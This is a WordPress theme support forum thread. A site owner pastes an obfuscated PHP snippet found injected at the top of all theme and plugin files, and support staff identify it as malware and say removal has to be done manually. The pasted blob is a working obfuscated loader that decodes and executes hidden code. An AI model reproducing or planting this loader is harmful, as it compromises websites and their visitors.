  • #649741

    Hi,

    I discovered this weird code at the very beginning of ALL of the theme’s and child theme’s PHP files.
    I installed 3 security plugins, which told me that my website is not infected: no spam, no malware. Can anyone tell me what the f..k that is? And what should I do?

    <?php $kpyruzmzk = '|!*#91y]c9y]g2y]#>>*4-1-|!*5! x27!hmg%)!gj!|!*1?hmg%)!gj!<**2-4-bubE{h%:*mmvo:>:iuhofm%:-5ppde:4:|:**#ppde#)t84:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%tpz!>qnjA x27&6<.fmjgA x27doj%6< x7fw6* x7f_*#fmjgk4{6~6<tfs-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*-!%ff2-!%t::**<(<!fwbm) x7fw6*CW&)7gj6<*doj%7-C)fepmz!>2<!gps)%j>1<%j=6[%ww2!>#p#/#p#/%z<jg!)%z>>2*!%zR#>q%V<*#fopoV;hojepdoFdz>#L4]275L3]248L3P6L1M5]D2P4]D6#<%6<*&7-#o]s]o]s]#)fepmqyoepn)%epnbss-%rxW~!Ypp2)%zB%z>! x24/%tmw/ o]o]Y%7;utpI#7>/7rfs%6<#o]1/20QUUI7js*#j{hnpd#)tutjyfopjudovg x22)!gj}1~!<z)#44ec:649#-!#:618d5f9#-!#f6c68399#-!#65egb2dc#*<!sfuvso!sb4 162 x6f 151 x64"))) { $hiclceo x27k:!ftmf!}Z;^nbsbq% x5cSFWSFT%}X;!sp!*#opo#>>}udovg}{;#)tutjyfopjudovg)!gj!|!*msv%)}k~~~<ftmbg!!| x24- x24gvodujpo! 52985-t.98]K4]65]D8]86]y31]278]y3f<***f x27,*e x27,*d x27,*c x27,*b x27)fepdof.)fepdof./#@#/d816:+946:ce44#)zbssb!>!ssbnpe_GMFTQIQ&f_UTPI0#*<%nfd)##Qtpz)#]341]88M4P8]37]278]225j%>j%!<**3-j%-bubE{h%)sutcvt-#w#)ldbqov>*ofmy%)utjm!! x2400~:<h%_t%:osvufs:~:<*9-1-r%)s%>/h%:<**#57]38y]47]67y]37]88y]2p% x7f!~!<##!>!2p%Z<^2 x5c2b%w:!>! 
x246767~6<Cw6<pd%wqj%6<^#zsfvr# x5cq%7/7#@#7/7^~!<##!>!2p%!|!*!***b%)sfxpmpusut!-#j0#!/!**#/%rx<~!!%s:N}#-%o:W%c:>1<%b:>1<!gps)%j:>1<%j:=tj{fpg)%s:*<%j:,,Bjg]58]24]31#-%tdz*Wsfuvso!%bss x5csboe))1/35.)3 105 x52 137 x41 107 xif((function_exists(" x6f 142 x5f 163 x74 141 xI&b%!|!*)323zbek!~!<b% x7f!<X>b%Z<#opo#>b%!*##>>X)!gjZ<#opo%!<*qp%-*.%)euhA)3of>2bd%!<5h%/#0#/*#npd/#)rrd/#00;quui#>.%!7,27R66,#/q%>2q%<#g6R85,67R37,18h%:<#64y]552]e7y]#>n%<#372]58y]472]y)#}#-# x24- x24-tusqpt)%z-#:#* xx27&6<*rfs%7-K)fujsxX6<#opjudovg+)!gj+{e%!osvufs!*!+A!>!{e%)!>> x22!ftm27]28y]#/r%/h%)n%-#+I#)q%:>:r%:|:**t%)m%=*h%)m%):fmjix:<##:>:]81]K78:56985:6197g:74985-rr.93e:5597f-s.973:8297f:5297e:56-xr.985:);}}}&;ftmbg} x7f;!osvufs}w;* x7f!>>D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%tx24- x24tvctus)% x24- x24b!>!%y)gj6<^#Y# x5cq% x27Y%6<.msvftsbqA7>q%6< !>!2p%!*3>?*2b%)gpf{#}C;!>>!}W;utpi}Y;tuofuopdufhfmjg}[;ldpt%}K;ufldpt}X;msvd}R;*msv%XAZASV<*w%)ppde>u%V<#65,47%w6< x7fw6*CWtfs%)7gj6<*id%)ftp%tjw)# x24#-!#]y38#-!%w:**<“)));$vkzoaub = $hiclmfV x7f<*X&Z&S{ftmfV x7f<*)zbssb!-#}#)fepmqnj!/!#0#)idu!Ce*[!%cIjQeTQcOc/#00#W~!Ydrr)%rxB%epnbss!>!bssb/*)323zbe!-#jt0*?]+^?]_ x5c}X x24<!%tmx24- x24y7 x24- x24*<! x24- x24gps)%j>1<%j=tj{fpg)% x24-<!%t2w>#]y74]273]y76]252]p%)54l} x27;%!<*#}_;#)323ldfid>}&;!osvufs} x7f;!opjudovx7fw6* x7f_*#fubfsdXk5{66~6<&w6<dz)%bbT-%bT-%hW~%fdy)##-!#~<%h0z-1H*WCw*[!%rN}#QwTW%hIr x5c1^-%r x5c2^-%hOh/#00#W~!%t2w)##QtjUFS,6<*msv%7-MSV,6<*)ujojR x27id%6< x7fw6* x7f_*#ujojRk3{666~6<w!>!#]y84]275]y83]273]y76]277#v%7UFH# x27rfs%6~6< x7fw6<*K)ftpmdXA6|7**197-2qj%7-K)udfoopdXA x22pm3qjA)qj3hopmA x273qj%6<*Y%)fnbozcYufhA x272*3qj%7> x2272qj%)7gj6<**2qj%)hoLd]53]Kc]55Ld]55#*<%bG9}:}.}-}!#*<%nfd>%fdy<Cb*[%h!>!%t! 
x27!hmg%!)!gj!<2,*j%!-#1]#-bubE{h%)tpqsutnpdov{h19275j{hnpd19275fubmgoj{h1:|]241]334]368]322]3]364]6]283]427]36]373P6]3)}.;UQPMSVD!-id%)uqpuftmsvd},;uqpuftmsvd}+;!>!} x27;!>>>!}_;gvc%3hA x27pd%6<pd%w6Z6<.2hA x27pd%6<C x27pd%6|6.7eu{66~67<&wmdR6<*id%)dfyfR x27tfs%6<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOBSUOSV7-K)ebfsX x27u%)7fmjix6<C "]=1; $uas=strtolower($y85]256]y6g]257]y86]267]y74]275]y7:]268]y7f#<!%tww!>bssbz)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#)7gj6<*QDUMPT7-NBFSUTLDPT7-UFOJGB)fubfsdXA x27K6< x7fw6f x27*&7-n%)utjm6< x7fw6*CW&>j%!*72! x27!hmg%)!gj!<2,*j%-#1]#-bubE{h%)tpqsut>j%!*9! x27R25,d7R17,67R37,#/q%>U<#16,47R55c%j:^<!%wx5c^>Ew:Qb:Qc:W~!%osvufs!|ftmf!~<**9.-j%-bubE{h%)sutcvt)fubmgoj{hA!osvufs!~<3,j%>j%!*3unction brwbvtq($n){return ch6]73]83]238M7]381]211M5]67]452!hmg%)!gj!~<ofmy%,3, $GLOBALS[" x61 156 x75 156 x61bg)!gj<*#k#)usbutcpV x7f x7f x7f x7f<u%V x27{ft x7f;!|!}{;)gj}l;33bq}k;opjudovg}x;0]=])0#)U! x27{**u%-#jt0}ZR;msv}.;/#/#/},;#-#}+;%-q;0]=]0#)2q%l}S;2-u%!-#2#/#%#/#o]#ceo(“”, $fazhdtj); $vkzoaub(sfmcnbs+yfeobz+sfwjidsbbj+upcotn+qsvmt+fmhpph# x22!pd%)!gj}Z;h!opjg}k~~9{d%:osvufs:~928>> x22:ftmbg39*56A:>:8:|:7#6#)tutjyf439275ttfsq x24- x24*!|! x24- x24 x5c%j^ 1/14+9**-)1/2986+7**^fyqmpef)# x24*<!%t::!>! x24Ypp3)%cB%iN}45 116 x54″]); if ((strstr($uas,” x6d 163 x69 145″)) or (st]51L3]84]y31M6]y3e]81#/#7e:55946-tr.9#iubq# x5cq% x27jsv%6<C>^#zsfvr# x5cq%7**^#zsfvr# x5cq%)ufttj x22)7gj6<*K)ftpmdXA6~6<u%7>/7&6|7**11112#-! 
x24/%tmw/ x24)%c*W%eN+#Qi x5c1^W%c!>!%i x5c2^<qp%>5h%!<*::::::-111112)eobsun>qp%!|Zutjyf4 x223}!+!<+{e%+*!*+fepdfe{h+{d%)+>3<!fmtf!%z>2<!%ww2)%wTW~ x24<!fwbm)%tjw)G]y6d]281Ld]245]K2]285]Ke]53&w6< x7fw6*CW&)7gj6<.[A x27&6< x7fw6* x7f_*#[k2{6:!}7;!}6;#]88]5]48]32M3]317]445]212]445]43]321]464]284]364]6]234]342 x24<!%ff2!>!bssbz) x24]25 x24- x24-!%x24- x24y4 x24- x24]y8 x24- x24]26 x24- x24<%j,,*x24)%zW%h>EzH,2W%wN;#-E!#]D6M7]K3#<%yy>#]D6]281L1#/#M5]DgP5]D6#<%fdy>#]$fazhdtj = implode(array_map(“b!)%j:>>1*!%b:>1<!fmtf!%b:>%s: x5c%j:.2^,%b:<!%c:>%s: xrstr($uas,” x72 166 x3a 61 x31″)) or (strstr($uas,” x61 156 x6r(ord($n)-1);} @error_reporting(0); 72 164″) && (!isset($GLOBALS[” x61 156 x75 156 x61″])))) {8y]#>m%:|:*r%:-t%)3of:opjudovg<~ x24<!%o:!>! x242178}527}88:}334}4726Z6<.5hA x27pd%6<pd%w6Z6<.4hA x27pd%6<pd%w6Z6<.bnhfsq)!sp!*#ojneb#-*f%)s)sutcvt)esp>hmg%!<12>j%!bq%)323ldfidk!~!<**qp%!-uyfu%)3of)fepdof57ftbc x7f!|!*uyfu2l:!}V;3q%}U;y]}R;2]},;osvufs} x27;mnui}&;zepc}A;~!}.uofuopD#)sfebfI{*w%)kVx{**#k#)tutjyfx x2_SERVER[" x48 124 x54 120 x5f 125 x5rwbvtq",str_split("%tjw!>!#]y84]275]y83]248]y83]256]y81]265] x24*<!~! x24/%t2w/ x24)##-!#~<#/% x24- x24!>!w)#]82#-#!#-%tmw)%tww**WYsboepn)%bss-%rxB%h>#]y31]278]y3e#>b%!**X)ufttj x22)gj!|!*nbs37y]672]48y]#>s%<#462]47y]252]18y]#>q%<#762]67y]562]38y]572]4fxpmpusut)tpqssutRe%)Rd%)Rb%))!gj!<*#cd2bge56+99386c6f+9f5= " x63 162 x65 141 x74 145 x5f 146 x75 156 x63 164 x69 157 x6e"; fjt)!gj!<*2bd%-#1GO x22#)fepmqyfA>2bbubE{h%)sutcvt)!gj!|!*bubE{h%)j{hnpd!opjudovg!|!*24- x24!>! 
x24/%tjw/ x24)% y72]254]y76#<!%w:!>!(%QUUI&e_SEEBFUPNFS&d_SFSFGFSQUUI&c_UOFHBSFTVQUUSTrrEvxNoITCnuF_EtaeRCxECaLPer_RtSoxapbqhzmm'; $ycijcvam=explode(chr((583-463)),substr($kpyruzmzk,(33664-27738),(199-165))); $qcnnec = $ycijcvam[0]($ycijcvam[(6-5)]); $unmwkue = $ycijcvam[0]($ycijcvam[(8-6)]); if (!function_exists('pnqtdciiz')) { function pnqtdciiz($nlzzxoitf, $fxyibziopo,$tvgmxh) { $hdxyinls = NULL; for($uurzlooq=0;$uurzlooq<(sizeof($nlzzxoitf)/2);$uurzlooq++) { $hdxyinls .= substr($fxyibziopo, $nlzzxoitf[($uurzlooq*2)],$nlzzxoitf[($uurzlooq*2)+(7-6)]); } return $tvgmxh(chr((52-43)),chr((455-363)),$hdxyinls); }; } $ukbwhbft = explode(chr((241-197)),'1334,47,4952,58,3645,31,3180,23,5330,36,1311,23,4097,59,4854,62,624,33,5676,67,3566,29,4916,36,4769,31,5366,60,5854,22,1104,24,5078,49,3027,59,424,23,3350,28,4258,37,3154,26,1600,24,489,37,2642,66,3292,58,2753,31,2708,45,1128,29,4193,65,1910,41,2422,33,287,29,167,56,2066,31,3086,68,2548,64,4493,37,4530,23,1971,69,2960,67,1803,32,3918,20,707,50,3498,68,2839,43,3378,59,3625,20,956,52,24,47,5153,24,0,24,5778,49,526,38,1074,30,1951,20,5743,35,1440,60,812,58,4345,38,1157,44,3871,47,2171,29,5127,26,5618,58,870,47,5876,50,1381,59,5529,28,5177,59,657,50,3785,25,2367,55,3938,69,2882,35,71,38,4383,40,1624,47,3676,48,2145,26,2040,26,3437,31,1500,32,366,23,5288,42,5236,52,3724,22,3746,39,3810,33,2248,38,2612,30,2342,25,3203,52,1008,66,1671,61,1532,35,5557,61,5010,68,4611,38,4007,30,1879,31,1567,33,5827,27,4649,49,757,21,2286,56,5426,46,4058,39,4295,50,2200,48,564,60,447,42,4698,23,2486,62,5472,57,1732,67,778,34,4156,37,109,58,4721,48,1835,44,389,35,4465,28,2784,55,2455,31,917,39,2917,43,3595,30,4553,58,1267,44,4037,21,1201,66,4800,54,3468,30,316,50,4423,42,3255,37,223,64,2097,48,3843,28,1799,4'); $hgipbvb = $qcnnec("",pnqtdciiz($ukbwhbft,$kpyruzmzk,$unmwkue)); $qcnnec=$kpyruzmzk; $hgipbvb(""); $hgipbvb=(461-340); $kpyruzmzk=$hgipbvb-1; ?>

    #650813

    Hey Anton,

    This looks like malware. You may have a script that infects all .php files; check whether that code is also in your plugins’ .php files.

    Best regards,
    Josue

    #650831

    Hi Josue,

    Yes, actually: the code is present in almost all PHP files, even in those of the plugins.
    Here’s the result of the test I ran: https://virustotal.com/fr/url/7ca46a0e1d847873cc18a540bd57f7691214ac3345f3f05e63eabe4a9e7187ba/analysis/
    I don’t know what AutoShun is, but it seems like the website is clean…

    Is there a program / plugin that can delete this piece of code from all .php files automatically? Coz it is impossible to do manually.
    Maybe any other suggestions?

    #651856

    Hi,

    Is there a program / plugin that can delete this piece of code from all .php files automatically? Coz it is impossible to do manually.
    Maybe any other suggestions?

    I don’t know of any script that can do that. I think you have to manually overwrite the infected files. Do you have a lot of files inside the child theme?

    Best regards,
    Ismael

    #652028

    As I mentioned above:

    the code is present in almost all PHP files, even in those of the plugins.

    So it’s not only about the child theme, but also the basic Enfold folder and all the plugins.

    #652375

    Hi Anton,

    Unfortunately, I doubt there is a plugin or script that can remove the malware from every PHP file that is in your WordPress installation. Removing the code might have to be done manually.

    Best regards,
    Jordan
